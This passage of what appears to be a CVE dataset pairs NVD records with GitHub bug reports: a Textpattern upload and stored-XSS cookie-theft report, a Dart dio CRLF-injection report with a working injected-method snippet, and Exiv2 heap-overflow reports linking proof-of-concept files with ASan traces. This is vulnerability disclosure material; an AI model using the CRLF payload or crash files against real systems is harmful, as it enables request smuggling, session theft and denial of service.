![image](https://user-images.githubusercontent.com/54694758/111631215-1bba4f00-882e-11eb-9a94-409010238ad2.png) Hacking tools connect to Trojan files to obtain system permissions. ![image](https://user-images.githubusercontent.com/54694758/111631232-207f0300-882e-11eb-8ce0-c3bb96ba7381.png) The second vulnerability: If a low-privilege user uses the vulnerability to write malicious code and publish it, all people who view this article will be attacked. He can obtain the administrator’s cookie information, and the administrator’s cookie can be used directly by the administrator. Log in to the background system with permission. You can also continue to exploit the first vulnerability after logging in. ![image](https://user-images.githubusercontent.com/54694758/111631287-2f65b580-882e-11eb-9a52-016b1e5ea32c.png) The administrator's access to the article triggers a pop-up window to verify that the vulnerability exists. ![image](https://user-images.githubusercontent.com/54694758/111631308-32f93c80-882e-11eb-96c8-cc8d6219c5c7.png) The attacker obtains the administrator cookie. ![image](https://user-images.githubusercontent.com/54694758/111631315-368cc380-882e-11eb-82fa-0bc05ab11b82.png) Repair suggestions: The first vulnerability: verify the format of the uploaded file, verify the content of the file, and set the uploaded file name to random. The second vulnerability: html entity conversion or filtering of sensitive words input by the user, such as <, >,', ", script.
Hi I found two loopholes.
https://api.github.com/repos/textpattern/textpattern/issues/1655/comments
3
2021-03-18T13:11:46Z
2021-04-16T06:24:38Z
https://github.com/textpattern/textpattern/issues/1655
834,792,045
1,655
1,842
CVE-2021-31402
2021-04-15T19:15:12.673
The dio package 4.0.0 for Dart allows CRLF injection if the attacker controls the HTTP method string, a different vulnerability than CVE-2020-35669.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flutterchina/dio/issues/1130" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flutterchina/dio/issues/1130" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flutterchina:dio:*:*:*:*:*:dart:*:*", "matchCriteriaId": "DF303871-154C-4E6B-BDAC-D6B1E369A225", "versionEndExcluding": "5.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/flutterchina/dio/issues/1130
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "flutterchina", "dio" ]
### New Issue Checklist - [x] I have searched for a similar issue in the [project](https://github.com/flutterchina/dio/issues) and found none ### Issue Info ENV: Any Examples generated on: ``` Dart SDK version: 2.13.0-204.0.dev (dev) (Unknown timestamp) on "linux_x64" dio version: 4.0.0 ``` ### Issue Description and Steps Please consider given snippet: ```dart import 'package:dio/dio.dart'; void main() async { var dio = Dio(); dio.options.baseUrl = 'http://localhost:1234'; var resp = await dio.request( '/test', options: Options( method: "GET http://example.com/ HTTP/1.1\r\nHost: example.com\r\nLLAMA:", //method: "GET", ), ); } ``` Generated call looks like ```bash nc -l -p 1234 GET HTTP://EXAMPLE.COM/ HTTP/1.1 HOST: EXAMPLE.COM LLAMA: /test HTTP/1.1 user-agent: Dart/2.13 (dart:io) accept-encoding: gzip content-length: 0 host: localhost:1234 ``` Which presents a security issue. Classic CRLF injection. #### Vector attack: If the attacker controls the HTTP method(verb), he can change a call and steal all cookies, session whatever is in a call. Assuming flow like `USER` -> `FOO` -> `BAR`, where flow between `FOO` and `BAR` is internal, mentioned data may leak. Let's assume I'm replacing example.com with my-hackery-uservice.org and the victim(service) is working in a company behind the proxy. This means I can easily redirect calls with headers/cookies(tokens) and blah blah blah. By doing more advanced CRLF I can remove the requirement for proxy at all. ### Expected behavior: if HTTP method(verb) is invalid, raise error.
CRLF in dio.request
https://api.github.com/repos/cfug/dio/issues/1130/comments
8
2021-04-15T08:40:27Z
2023-03-22T06:09:33Z
https://github.com/cfug/dio/issues/1130
858,644,181
1,130
1,843
CVE-2021-29457
2021-04-19T19:15:17.920
Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. A heap buffer overflow was found in Exiv2 versions v0.27.3 and earlier. The heap overflow is triggered when Exiv2 is used to write metadata into a crafted image file. An attacker could potentially exploit the vulnerability to gain code execution, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when _writing_ the metadata, which is a less frequently used Exiv2 operation than _reading_ the metadata. For example, to trigger the bug in the Exiv2 command-line application, you need to add an extra command-line argument such as `insert`. The bug is fixed in version v0.27.4.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/1529" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/pull/1534" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/security/advisories/GHSA-v74w-h496-cgqm" }, { "source": "security-advisories@github.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00028.html" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2XQT5F5IINTDYDAFGVGQZ7PMMLG7I5ZZ/" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P2A5GMJEXQ5Q76JK6F6VKK5JYCLVFGKN/" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://security.gentoo.org/glsa/202312-06" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4958" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/1529" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/pull/1534" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/security/advisories/GHSA-v74w-h496-cgqm" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00028.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2XQT5F5IINTDYDAFGVGQZ7PMMLG7I5ZZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P2A5GMJEXQ5Q76JK6F6VKK5JYCLVFGKN/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202312-06" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4958" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0A049EBD-7A7E-458F-9ABD-F6626DDEABB9", "versionEndExcluding": "0.27.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "122" ]
122
https://github.com/Exiv2/exiv2/issues/1529
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "Exiv2", "exiv2" ]
**VERSION** exiv 2 0.27.4.1 https://github.com/Exiv2/exiv2/tree/0.27-maintenance **REPRODUCE** Compile exiv2 with asan: ``` CC=clang CXX=clang++ cmake .. -DCMAKE_BUILD_TYPE=Release -DCMAKE_CXX_FLAGS="-fsanitize=address" \ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \ -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" ``` Dowload testcases: https://github.com/henices/pocs/raw/master/tests_83a94b3337206caa6803f625eb63db061395cf14 https://github.com/henices/pocs/raw/master/tests_83a94b3337206caa6803f625eb63db061395cf14.exv exiv2 in tests_83a94b3337206caa6803f625eb63db061395cf14 ``` ================================================================= ==4194247==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000000f7 at pc 0x7f55bcfeed2d bp 0x7ffd0d945470 sp 0x7ffd0d945468 WRITE of size 8 at 0x6020000000f7 thread T0 #0 0x7f55bcfeed2c in Exiv2::Jp2Image::doWriteMetadata(Exiv2::BasicIo&) (/home/henices/tests/exiv2/build_asan/lib/libexiv2.so.27+0x3b3d2c) #1 0x7f55bcfec857 in Exiv2::Jp2Image::writeMetadata() (/home/henices/tests/exiv2/build_asan/lib/libexiv2.so.27+0x3b1857) #2 0x541653 in (anonymous namespace)::metacopy(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, int, bool) (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x541653) #3 0x545049 in Action::Insert::run(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x545049) #4 0x4fddf3 in main (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x4fddf3) #5 0x7f55bc6da1e1 in __libc_start_main /usr/src/debug/glibc-2.32-37-g760e1d2878/csu/../csu/libc-start.c:314:16 #6 0x4224cd in _start (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x4224cd) 0x6020000000f7 is located 5 bytes to the right of 2-byte region [0x6020000000f0,0x6020000000f2) allocated by thread T0 here: #0 0x4fad47 in operator new[](unsigned long) (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x4fad47) #1 0x7f55bd064606 in Exiv2::DataBuf::DataBuf(long) (/home/henices/tests/exiv2/build_asan/lib/libexiv2.so.27+0x429606) #2 0x7f55bcfec857 in Exiv2::Jp2Image::writeMetadata() (/home/henices/tests/exiv2/build_asan/lib/libexiv2.so.27+0x3b1857) #3 0x541653 in (anonymous namespace)::metacopy(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, int, bool) (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x541653) #4 0x545049 in Action::Insert::run(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x545049) #5 0x4fddf3 in main (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x4fddf3) #6 0x7f55bc6da1e1 in __libc_start_main /usr/src/debug/glibc-2.32-37-g760e1d2878/csu/../csu/libc-start.c:314:16 SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/henices/tests/exiv2/build_asan/lib/libexiv2.so.27+0x3b3d2c) in Exiv2::Jp2Image::doWriteMetadata(Exiv2::BasicIo&) Shadow bytes around the buggy address: 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa fd fa fa fa fd fa fa fa 00 00 fa fa 00 00 =>0x0c047fff8010: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa[02]fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==4194247==ABORTING ``` Credit: Zhen Zhou of NSFOCUS Security Team
heap-buffer-overflow write in Exiv2::Jp2Image::doWriteMetadata
https://api.github.com/repos/Exiv2/exiv2/issues/1529/comments
4
2021-04-08T03:01:08Z
2021-08-06T08:31:08Z
https://github.com/Exiv2/exiv2/issues/1529
853,009,339
1,529
1,844
CVE-2021-29458
2021-04-19T19:15:18.017
Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An out-of-bounds read was found in Exiv2 versions v0.27.3 and earlier. The out-of-bounds read is triggered when Exiv2 is used to write metadata into a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service by crashing Exiv2, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when writing the metadata, which is a less frequently used Exiv2 operation than reading the metadata. For example, to trigger the bug in the Exiv2 command-line application, you need to add an extra command-line argument such as insert. The bug is fixed in version v0.27.4.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/1530" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/pull/1536" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/security/advisories/GHSA-57jj-75fm-9rq5" }, { "source": "security-advisories@github.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00004.html" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2XQT5F5IINTDYDAFGVGQZ7PMMLG7I5ZZ/" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P2A5GMJEXQ5Q76JK6F6VKK5JYCLVFGKN/" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://security.gentoo.org/glsa/202312-06" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/1530" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/pull/1536" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/security/advisories/GHSA-57jj-75fm-9rq5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00004.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2XQT5F5IINTDYDAFGVGQZ7PMMLG7I5ZZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P2A5GMJEXQ5Q76JK6F6VKK5JYCLVFGKN/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202312-06" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0A049EBD-7A7E-458F-9ABD-F6626DDEABB9", "versionEndExcluding": "0.27.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/Exiv2/exiv2/issues/1530
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Exiv2", "exiv2" ]
**VERSION** exiv 2 0.27.4.1 https://github.com/Exiv2/exiv2/tree/0.27-maintenance **REPRODUCE** Compile exiv2 with asan: ``` CC=clang CXX=clang++ cmake .. -DCMAKE_BUILD_TYPE=Release -DCMAKE_CXX_FLAGS="-fsanitize=address" \ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \ -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" ``` Dowload testcases: https://github.com/henices/pocs/raw/master/tests_1bd0a5f4935b053f33ac00f931dde1f47a043487 https://github.com/henices/pocs/raw/master/tests_1bd0a5f4935b053f33ac00f931dde1f47a043487.exv Run command: `exiv2 in tests_1bd0a5f4935b053f33ac00f931dde1f47a043487` ``` ================================================================= ==119384==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62600000585e at pc 0x0000004c4d0a bp 0x7ffef1036370 sp 0x7ffef1035b20 READ of size 4294967293 at 0x62600000585e thread T0 #0 0x4c4d09 in __asan_memcpy (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x4c4d09) #1 0x7f40c9907d88 in Exiv2::Internal::CrwMap::encode0x1810(Exiv2::Image const&, Exiv2::Internal::CrwMapping const*, Exiv2::Internal::CiffHeader*) (/home/henices/tests/exiv2/build_asan/lib/libexiv2.so.27+0x4c8d88) #2 0x7f40c9911007 in Exiv2::Internal::CrwMap::encode(Exiv2::Internal::CiffHeader*, Exiv2::Image const&) (/home/henices/tests/exiv2/build_asan/lib/libexiv2.so.27+0x4d2007) #3 0x7f40c9769376 in Exiv2::CrwImage::writeMetadata() (/home/henices/tests/exiv2/build_asan/lib/libexiv2.so.27+0x32a376) #4 0x541653 in (anonymous namespace)::metacopy(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, int, bool) (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x541653) #5 0x545049 in Action::Insert::run(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x545049) #6 0x4fddf3 in main (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x4fddf3) #7 0x7f40c8ede1e1 in __libc_start_main /usr/src/debug/glibc-2.32-37-g760e1d2878/csu/../csu/libc-start.c:314:16 #8 0x4224cd in _start (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x4224cd) 0x62600000585e is located 0 bytes to the right of 10078-byte region [0x626000003100,0x62600000585e) allocated by thread T0 here: #0 0x4fad47 in operator new[](unsigned long) (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x4fad47) #1 0x7f40c98688b1 in Exiv2::DataBuf::alloc(long) (/home/henices/tests/exiv2/build_asan/lib/libexiv2.so.27+0x4298b1) #2 0x541653 in (anonymous namespace)::metacopy(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, int, bool) (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x541653) #3 0x545049 in Action::Insert::run(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x545049) #4 0x4fddf3 in main (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x4fddf3) #5 0x7f40c8ede1e1 in __libc_start_main /usr/src/debug/glibc-2.32-37-g760e1d2878/csu/../csu/libc-start.c:314:16 SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/henices/tests/exiv2/build_asan/bin/exiv2+0x4c4d09) in __asan_memcpy Shadow bytes around the buggy address: 0x0c4c7fff8ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4c7fff8ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4c7fff8ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4c7fff8ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4c7fff8af0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c4c7fff8b00: 00 00 00 00 00 00 00 00 00 00 00[06]fa fa fa fa 0x0c4c7fff8b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4c7fff8b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4c7fff8b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4c7fff8b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4c7fff8b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==119384==ABORTING ``` Credit: Zhen Zhou of NSFOCUS Security Team
heap-buffer-overflow Read in Exiv2::Internal::CrwMap::encode
https://api.github.com/repos/Exiv2/exiv2/issues/1530/comments
15
2021-04-08T07:27:55Z
2021-08-06T08:37:06Z
https://github.com/Exiv2/exiv2/issues/1530
853,159,049
1,530
1,845
CVE-2021-31254
2021-04-19T19:15:18.077
Buffer overflow in the tenc_box_read function in MP4Box in GPAC 1.0.1 allows attackers to cause a denial of service or execute arbitrary code via a crafted file, related invalid IV sizes.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/8986422c21fbd9a7bf6561cae65aae42077447e8" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1703" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/8986422c21fbd9a7bf6561cae65aae42077447e8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1703" } ]
